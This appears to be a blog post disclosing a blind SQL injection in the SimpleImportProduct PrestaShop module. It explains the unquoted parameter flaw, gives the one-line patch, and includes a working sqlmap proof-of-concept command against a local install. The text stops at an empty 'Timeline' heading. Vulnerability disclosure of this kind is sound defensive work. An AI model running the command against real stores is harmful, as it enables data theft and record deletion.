This blog post details an SQL Injection we found within SimpleImportProduct, a Prestashop module developed by MyPrestaModules. In modules/simpleimportproduct/send.php there is the following code:

  if ( Tools::getValue('remove') == true){  
    $key = Tools::getValue('key');  
    $key = pSQL($key);  
    Db::getInstance()->delete('simpleimport_tasks', "import_settings=$key");

This is vulnerable to SQL injection which allows an attacker to extract data from the database.
The key parameter does get sanitized by pSQL() but when it’s put in the query it’s not surrounded by quotes so an attacker can still manipulate the query. This is a similar situation to an SQLi I found in a different Prestashop module.

Adding quotes around the key would be sufficient to patch this SQLi:

Db::getInstance()->delete('simpleimport_tasks', "import_settings='$key'");

Proof of Concept

To test this we used SQLmap on a local Prestashop install. Care should be taken when testing for this as it is within a DELETE SQL query and can result in records getting deleted. SQLMap command:

sqlmap -u "http://localhost:8080/modules/simpleimportproduct/send.php?ajax=true&remove=true&key=1*" --threads=10 --random-agent --dbms=mysql --level=5 --risk=3 --tables  

It’s a “blind” SQLi as it doesnt affect the contents of the page so information is extracted using SLEEP() to change the time it takes to respond.

Timeline